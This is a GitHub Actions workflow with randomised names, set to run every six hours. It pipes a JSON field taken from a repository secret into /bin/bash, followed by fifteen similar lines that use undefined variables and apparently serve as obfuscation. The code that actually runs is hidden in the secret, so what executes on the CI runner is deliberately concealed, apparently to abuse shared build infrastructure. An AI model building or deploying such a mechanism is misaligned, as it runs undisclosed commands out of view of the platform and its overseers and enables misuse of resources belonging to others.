name: jinchangfa7145
on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinchangfa7145
        env:
          jr39: ${{ secrets.jr39 }}
        run: |
          echo $jr39 | jq -r .g86485 | /bin/bash
          echo $velny0 | jq -r .krm61 | /bin/bash
          echo $prc9059 | jq -r .evfk53 | /bin/bash
          echo $ko4 | jq -r .pqcxi99 | /bin/bash
          echo $n7609 | jq -r .b726 | /bin/bash
          echo $idyuq8 | jq -r .oixi7 | /bin/bash
          echo $lzi93 | jq -r .jqu902 | /bin/bash
          echo $fjav95656 | jq -r .dvu96610 | /bin/bash
          echo $rpkm8514 | jq -r .dek08106 | /bin/bash
          echo $vq981 | jq -r .qy96 | /bin/bash
          echo $whpp09623 | jq -r .jqhqt44079 | /bin/bash
          echo $i9677 | jq -r .jlv56428 | /bin/bash
          echo $cb6982 | jq -r .wtv96 | /bin/bash
          echo $ib8529 | jq -r .sl0 | /bin/bash
          echo $ofry1190 | jq -r .zgbl1 | /bin/bash
          echo $vl8 | jq -r .uvz8124 | /bin/bash

